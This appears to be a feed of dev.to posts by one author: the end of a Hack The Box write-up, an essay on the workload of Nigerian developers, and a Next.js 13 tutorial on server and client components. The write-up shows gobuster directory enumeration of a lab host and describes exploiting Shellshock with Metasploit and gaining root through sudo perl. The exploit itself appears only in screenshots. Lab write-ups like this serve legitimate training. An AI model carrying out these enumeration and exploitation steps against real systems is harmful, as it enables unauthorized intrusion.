src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2azn73w7fb20vkv2k1m2.jpg" alt="web-app" width="800" height="405"></a></p> <p>At first, when I saw this web-page, I froze. But let's try to bust the directories maybe we can see something juicy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gobuster dir -u http://10.129.16.77/ -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.16.77/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 291] /.htaccess (Status: 403) [Size: 296] /.htpasswd (Status: 403) [Size: 296] /cgi-bin/ (Status: 403) [Size: 295] /index.html (Status: 200) [Size: 137] /server-status (Status: 403) [Size: 300] Progress: 4614 / 4615 (99.98%) =============================================================== Finished </code></pre> </div> <p>If we try to check /server-status and /cgi-bin/, we can see:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftv45djnsypdk19y99c49.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftv45djnsypdk19y99c49.jpg" alt="load-error" width="800" height="243"></a></p> <p>So, there seems to be no way here, I wanted to go to the port 2222 at this point, but I decided to drill down to the DIR /server-status and /cgi-bin/ if something would come up.</p> <p>Then I dig but this time, I added -x php,html,txt,sh,pl,cgi to check special files:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gobuster dir -u http://10.129.16.77/cgi-bin -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,sh,pl,cgi =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.16.77/cgi-bin [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: html,txt,sh,pl,cgi,php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.html (Status: 403) [Size: 300] /.hta.sh (Status: 403) [Size: 302] /.hta (Status: 403) [Size: 299] /.hta.pl (Status: 403) [Size: 302] /.hta.cgi (Status: 403) [Size: 303] /.hta.php (Status: 403) [Size: 303] /.hta.html (Status: 403) [Size: 304] /.htaccess.php (Status: 403) [Size: 308] /.htaccess.txt (Status: 403) [Size: 308] /.htaccess.html (Status: 403) [Size: 309] /.htaccess.sh (Status: 403) [Size: 307] /.htaccess (Status: 403) [Size: 304] /.hta.txt (Status: 403) [Size: 303] /.htaccess.pl (Status: 403) [Size: 307] /.htaccess.cgi (Status: 403) [Size: 308] /.htpasswd (Status: 403) [Size: 304] /.htpasswd.pl (Status: 403) [Size: 307] /.htpasswd.cgi (Status: 403) [Size: 308] /.htpasswd.php (Status: 403) [Size: 308] /.htpasswd.html (Status: 403) [Size: 309] /.htpasswd.txt (Status: 403) [Size: 308] /.htpasswd.sh (Status: 403) [Size: 307] /user.sh (Status: 200) [Size: 119] Progress: 32298 / 32305 (99.98%) =============================================================== Finished </code></pre> </div> <p>In the above scan, I got a script back user.sh, this can be juicy. but when I opened it:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs2a2gx11w0mwys57u5mx.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs2a2gx11w0mwys57u5mx.jpg" alt="page" width="800" height="227"></a></p> <p>I decide to dig a little about what I can see about cgi-bin and I found out shellshock. So I Check cgi with NMAP to see if something would come and it is vulnerable to shellock:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flm2azf28j8mb5fryek9r.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flm2azf28j8mb5fryek9r.jpg" alt="nmap-scan" width="800" height="371"></a></p> <p>Let's say luck found me, it's vulnerable to shellshock, so fired up my metasploit and search for it:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tfvb6puuhxmr7ts19aq.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tfvb6puuhxmr7ts19aq.jpg" alt="metasploit" width="800" height="201"></a></p> <h2> ⚡ Exploitation </h2> <p>The next step for us would be to exploit the target machine, on metasploit, I set all the options needed, then the target was down in seconds:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft61ys4rw4jgbni91ht65.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft61ys4rw4jgbni91ht65.jpg" alt="meterpreter" width="800" height="228"></a></p> <p>Let's do our victory dance!!!</p> <h2> ⚡ Privilege Escalation </h2> <p>As we can see the user we compromised is 'shelly' so we need to elivate our privilege to 'root'</p> <p>I checked to see what can the user run with root access without password:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwhszbd7y436d7uaz1d1f.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwhszbd7y436d7uaz1d1f.jpg" alt="shell" width="800" height="154"></a></p> <p>We are convinced that the user can run /usr/bin/perl without password, that might our path to root. Let's check for the binary on GTFBins:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Focux4dlyj086zi7p8o8p.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Focux4dlyj086zi7p8o8p.jpg" alt="bins" width="800" height="143"></a></p> <p>Now let's run the binary with 'sudo', because we know we can do that:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxpy7zyq9t1gqjz8m3xzp.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxpy7zyq9t1gqjz8m3xzp.jpg" alt="root" width="800" height="145"></a></p> <p>We are root!! Yeepee!!!</p> ai security cybersecurity hackthebox The Hidden Weight Nigerian Developers Carry Michael Oladele Tue, 02 Dec 2025 09:07:03 +0000 https://forem.com/micheaol/the-hidden-weight-nigerian-developers-carry-1lec https://forem.com/micheaol/the-hidden-weight-nigerian-developers-carry-1lec <p>In a perfect world, the SDLC is linear:</p> <p>Requirements → Design → Development → Testing → Deployment → Maintenance.</p> <p>In Nigeria, the reality is very different.</p> <p>Here, the average "developer" is actually:</p> <ul> <li>a backend engineer </li> <li>a frontend engineer </li> <li>a product thinker </li> <li>a UI/UX designer </li> <li>a DevOps engineer </li> <li>a QA tester </li> <li>a cloud engineer (yes, job posts still ask “Do you know AWS?”) </li> <li>and the person who fixes production at 2 a.m.</li> </ul> <p>All in one role.<br><br> All on one salary.<br><br> A salary that often doesn’t match even <em>one</em> of those roles abroad.</p> <h2> 💢 The Disrespect Nobody Talks About </h2> <p>What hurts more than the workload is the treatment.</p> <p>Too many developers have heard this line:<br><br> <strong>“Why didn't you complete the design level?”</strong></p> <p>Meanwhile the same developer was already juggling:</p> <ul> <li>Architecture </li> <li>Backend </li> <li>Frontend </li> <li>Documentation </li> <li>QA </li> <li>Deployment </li> <li>Support </li> <li>And cloud infrastructure </li> </ul> <p>Imagine doing six jobs and being blamed for the seventh.</p> <h2> 🔥 Yet Nigerian Developers Still Shine </h2> <p>Despite the chaos, Nigerian developers:</p> <ul> <li>build world-class products </li> <li>lead remote teams </li> <li>learn extremely fast </li> <li>innovate under pressure </li> <li>and compete globally at the highest level </li> </ul> <p>It’s almost unreal how excellence grows in such tough environments.</p> <h2> ❤️ A Word to Every Nigerian Developer </h2> <p>You’re doing more than enough.<br><br> Your skill is not the problem.<br><br> Your environment is.</p> <p>Protect your peace.<br><br> Ask for clarity.<br><br> Set boundaries.<br><br> Demand respect.</p> <p>Nigerian developers aren’t underrated because of lack of talent.<br><br> They’re underrated because they do too much, too quietly.</p> <p>It’s time that changed.</p> <p><em>If this resonated, feel free to share your experience in the comments. Let’s make the conversation louder.</em></p> developers ai design nigeria Server vs. Client Components in Next.js 13: When and How to Use Them Michael Oladele Wed, 23 Oct 2024 18:18:59 +0000 https://forem.com/micheaol/server-vs-client-components-in-nextjs-13-when-and-how-to-use-them-2dj7 https://forem.com/micheaol/server-vs-client-components-in-nextjs-13-when-and-how-to-use-them-2dj7 <p>Next.js 13 introduced React Server Components, giving developers the power to choose where and how to render components—either on the server for performance or on the client for interactivity. This flexibility allows us to build apps that combine speed and dynamic capabilities.</p> <p>In this article, we’ll explore not just the basics, but also dive into how to use server components within client components—a common need when building dynamic, efficient apps.</p> <h2> Understanding Server Components </h2> <p>Server components are rendered entirely on the server and don’t require any client-side JavaScript. They’re perfect for static content like headers, footers, or even data-driven components that don't need user interaction.</p> <h4> Example: Simple Server Component </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// app/components/Header.js</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Header</span><span class="p">()</span> <span class="p">{</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">header</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h1</span><span class="o">&gt;</span><span class="nx">My</span> <span class="nx">Static</span> <span class="nx">Header</span><span class="o">&lt;</span><span class="sr">/h1</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/header</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>This component is rendered on the server and doesn't involve any client-side interaction, meaning it loads faster with less JavaScript.</p> <h2> Benefits of Server Components </h2> <ul> <li> <strong>Reduced JavaScript Payload</strong>: Server components reduce the amount of JavaScript sent to the browser.</li> <li> <strong>Improved Data Fetching</strong>: Server components can fetch data closer to the database, reducing network latency.</li> </ul> <h4> Fetching Data in a Server Component </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// app/components/PostList.js</span> <span class="k">export</span> <span class="k">default</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">PostList</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://jsonplaceholder.typicode.com/posts</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">posts</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">ul</span><span class="o">&gt;</span> <span class="p">{</span><span class="nx">posts</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">5</span><span class="p">).</span><span class="nf">map</span><span class="p">((</span><span class="nx">post</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">(</span> <span class="o">&lt;</span><span class="nx">li</span> <span class="nx">key</span><span class="o">=</span><span class="p">{</span><span class="nx">post</span><span class="p">.</span><span class="nx">id</span><span class="p">}</span><span class="o">&gt;</span><span class="p">{</span><span class="nx">post</span><span class="p">.</span><span class="nx">title</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/li</span><span class="err">&gt; </span> <span class="p">))}</span> <span class="o">&lt;</span><span class="sr">/ul</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>This PostList component fetches data on the server and sends the pre-rendered HTML to the client, ensuring faster load times.</p> <h2> When to Use Client Components </h2> <p>Client components are essential when you need interactivity, such as form inputs, event listeners, or dynamic content. These components use JavaScript on the client to handle user interactions.</p> <h4> Example: Client Component for Interactivity </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// app/components/SearchBar.js</span> <span class="dl">'</span><span class="s1">use client</span><span class="dl">'</span><span class="p">;</span> <span class="c1">// This makes the component a client component</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">SearchBar</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">searchTerm</span><span class="p">,</span> <span class="nx">setSearchTerm</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">text</span><span class="dl">"</span> <span class="nx">value</span><span class="o">=</span><span class="p">{</span><span class="nx">searchTerm</span><span class="p">}</span> <span class="nx">onChange</span><span class="o">=</span><span class="p">{(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setSearchTerm</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)}</span> <span class="nx">placeholder</span><span class="o">=</span><span class="dl">"</span><span class="s2">Search...</span><span class="dl">"</span> <span class="o">/&gt;</span> <span class="o">&lt;</span><span class="nx">p</span><span class="o">&gt;</span><span class="nx">Searching</span> <span class="k">for</span><span class="p">:</span> <span class="p">{</span><span class="nx">searchTerm</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/p</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>The SearchBar is interactive, so it needs to be a client component. You can use the useState hook and other React hooks only in client components.</p> <p>You might have a use-case to combine Server and Client Components, so let's talk on how to do that next:</p> <h2> Combining Server and Client Components </h2> <p>A core strength of Next.js 13 is the ability to combine server and client components. A best practice is to use server components by default and push client components as deep as possible into your component tree.</p> <h4> Example: Combining Server and Client Components </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// app/layout.js</span> <span class="k">import</span> <span class="nx">SearchBar</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./components/SearchBar</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Layout</span><span class="p">({</span> <span class="nx">children</span> <span class="p">})</span> <span class="p">{</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">header</span><span class="o">&gt;</span><span class="nx">My</span> <span class="nx">Blog</span><span class="o">&lt;</span><span class="sr">/header</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">SearchBar</span> <span class="o">/&gt;</span> <span class="p">{</span><span class="cm">/* Client component for interactivity */</span><span class="p">}</span> <span class="p">{</span><span class="nx">children</span><span class="p">}</span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>The SearchBar component handles client-side interactivity, while the rest of the layout is server-rendered, offering a balance between performance and interactivity.</p> <p>On the other-way round, you might have a use-case to use server component inside a client component. Let's check out how to do that.</p> <h2> How to Use Server Components Inside Client Components </h2> <p>It’s important to understand that server components can be nested inside client components, but not imported directly into them. To include a server component in a client component, you pass it as children or a prop to avoid breaking the boundary between the two.</p> <h4> Example: Passing a Server Component to a Client Component </h4> <p>Here’s a real-world example where a server component is passed as a child to a client component:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// app/components/Profile.js (Server Component)</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Profile</span><span class="p">({</span> <span class="nx">user</span> <span class="p">})</span> <span class="p">{</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h2</span><span class="o">&gt;</span><span class="p">{</span><span class="nx">user</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/h2</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">p</span><span class="o">&gt;</span><span class="nx">Email</span><span class="p">:</span> <span class="p">{</span><span class="nx">user</span><span class="p">.</span><span class="nx">email</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/p</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> <span class="c1">// app/components/Dashboard.js (Client Component)</span> <span class="dl">'</span><span class="s1">use client</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Dashboard</span><span class="p">({</span> <span class="nx">children</span> <span class="p">})</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">showProfile</span><span class="p">,</span> <span class="nx">setShowProfile</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">button</span> <span class="nx">onClick</span><span class="o">=</span><span class="p">{()</span> <span class="o">=&gt;</span> <span class="nf">setShowProfile</span><span class="p">(</span><span class="o">!</span><span class="nx">showProfile</span><span class="p">)}</span><span class="o">&gt;</span> <span class="p">{</span><span class="nx">showProfile</span> <span class="p">?</span> <span class="dl">'</span><span class="s1">Hide Profile</span><span class="dl">'</span> <span class="p">:</span> <span class="dl">'</span><span class="s1">Show Profile</span><span class="dl">'</span><span class="p">}</span> <span class="o">&lt;</span><span class="sr">/button</span><span class="err">&gt; </span> <span class="p">{</span><span class="nx">showProfile</span> <span class="o">&amp;&amp;</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span><span class="p">{</span><span class="nx">children</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/div&gt;} {/</span><span class="o">*</span> <span class="nx">Server</span> <span class="nx">component</span> <span class="nx">passed</span> <span class="k">as</span> <span class="nx">children</span> <span class="o">*</span><span class="sr">/</span><span class="err">} </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> <span class="c1">// app/page.js (Main Page using both components)</span> <span class="k">import</span> <span class="nx">Profile</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./components/Profile</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="nx">Dashboard</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./components/Dashboard</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">Page</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">user</span> <span class="o">=</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">John Doe</span><span class="dl">'</span><span class="p">,</span> <span class="na">email</span><span class="p">:</span> <span class="dl">'</span><span class="s1">john@example.com</span><span class="dl">'</span> <span class="p">};</span> <span class="c1">// Static example</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">Dashboard</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">Profile</span> <span class="nx">user</span><span class="o">=</span><span class="p">{</span><span class="nx">user</span><span class="p">}</span> <span class="sr">/&gt; {/</span><span class="o">*</span> <span class="nx">Passing</span> <span class="nx">the</span> <span class="nx">server</span> <span class="nx">component</span> <span class="nx">to</span> <span class="nx">client</span> <span class="o">*</span><span class="sr">/</span><span class="err">} </span> <span class="o">&lt;</span><span class="sr">/Dashboard</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>In the above example:</p> <ul> <li> <strong>Profile</strong> is a server component, fetching data or displaying static content.</li> <li> <strong>Dashboard</strong> is a client component handling interactions (showing/hiding the profile).</li> <li>The <strong>Profile</strong> server component is passed as children to the Dashboard client component.</li> </ul> <p>This pattern allows you to use the benefits of server rendering (less JavaScript, improved performance) while still having client-side interactivity.</p> <h2> Third-Party Libraries and Client Components </h2> <p>Many third-party libraries like authentication providers or UI components rely on React hooks, which can only be used in client components. Here’s how you can work around that limitation by wrapping third-party libraries inside client components:</p> <h4> Example: Using a Third-Party Carousel </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// app/components/Carousel.js</span> <span class="dl">'</span><span class="s1">use client</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="nx">Carousel</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react-slick</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">MyCarousel</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">settings</span> <span class="o">=</span> <span class="p">{</span> <span class="na">dots</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="na">infinite</span><span class="p">:</span> <span class="kc">true</span> <span class="p">};</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">Carousel</span> <span class="p">{...</span><span class="nx">settings</span><span class="p">}</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;&lt;</span><span class="nx">h3</span><span class="o">&gt;</span><span class="nx">Slide</span> <span class="mi">1</span><span class="o">&lt;</span><span class="sr">/h3&gt;&lt;/</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;&lt;</span><span class="nx">h3</span><span class="o">&gt;</span><span class="nx">Slide</span> <span class="mi">2</span><span class="o">&lt;</span><span class="sr">/h3&gt;&lt;/</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="sr">/Carousel</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> <span class="c1">// app/page.js</span> <span class="k">import</span> <span class="nx">MyCarousel</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./components/Carousel</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Page</span><span class="p">()</span> <span class="p">{</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h1</span><span class="o">&gt;</span><span class="nx">Welcome</span> <span class="nx">to</span> <span class="nx">the</span> <span class="nx">App</span><span class="o">&lt;</span><span class="sr">/h1</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">MyCarousel</span> <span class="o">/&gt;</span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>By wrapping the third-party react-slick carousel in a client component, we can use it in the server-rendered page while still accessing client-side features like interactivity.</p> <h2> Handling Props Between Server and Client Components </h2> <p>When passing data between server and client components, the props must be serializable (e.g., strings, numbers, booleans). Complex objects like functions or instances of classes can’t be passed.</p> <h4> Example: Passing Data from Server to Client </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// app/page.js (Server Component)</span> <span class="k">import</span> <span class="nx">UserCard</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./components/UserCard</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">Page</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">user</span> <span class="o">=</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Jane Doe</span><span class="dl">'</span><span class="p">,</span> <span class="na">age</span><span class="p">:</span> <span class="mi">30</span> <span class="p">};</span> <span class="c1">// Simple serializable data</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h1</span><span class="o">&gt;</span><span class="nx">Welcome</span> <span class="nx">to</span> <span class="nx">the</span> <span class="nx">App</span><span class="o">&lt;</span><span class="sr">/h1</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">UserCard</span> <span class="nx">user</span><span class="o">=</span><span class="p">{</span><span class="nx">user</span><span class="p">}</span> <span class="sr">/&gt; {/</span><span class="o">*</span> <span class="nx">Passing</span> <span class="nx">serializable</span> <span class="nx">data</span> <span class="nx">to</span> <span class="nx">client</span> <span class="nx">component</span> <span class="o">*</span><span class="sr">/</span><span class="err">} </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> <span class="c1">// app/components/UserCard.js (Client Component)</span> <span class="dl">'</span><span class="s1">use client</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">UserCard</span><span class="p">({</span> <span class="nx">user</span> <span class="p">})</span> <span class="p">{</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h2</span><span class="o">&gt;</span><span class="p">{</span><span class="nx">user</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/h2</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">p</span><span class="o">&gt;</span><span class="nx">Age</span><span class="p">:</span> <span class="p">{</span><span class="nx">user</span><span class="p">.</span><span class="nx">age</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/p</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>The UserCard client component can now dynamically render the data passed from the server component while ensuring that everything remains serializable and thus passes through the server-client boundary without issues.</p> <p>With all said, it would be interesting to conclude this with best practises. Let's move to that next:</p> <h2> Best Practices for Server and Client Component Composition </h2> <p>Here are a few tips for composing server and client components effectively:</p> <ol> <li><p><strong>Default to Server Components</strong>: Use server components wherever possible for static or data-driven content to reduce JavaScript load and improve performance.</p></li> <li><p><strong>Use Client Components for Interactivity</strong>: Only use client components where user interaction or browser-specific APIs are needed.</p></li> <li><p><strong>Move Client Components Down the Tree</strong>: Push client components as deep into the component tree as possible. This allows more of your app to be rendered on the server, boosting performance.</p></li> <li><p><strong>Pass Server Components as Children</strong>: If a server component needs to be used within a client component, pass it as children or a prop instead of directly importing it.</p></li> </ol> <h2> Final word: Striking the Balance Between Performance and Interactivity </h2> <p>With Next.js 13, you have the flexibility to render components on both the server and the client. By defaulting to server components for static content and client components for interactivity, and by managing the boundary between the two carefully, you can build 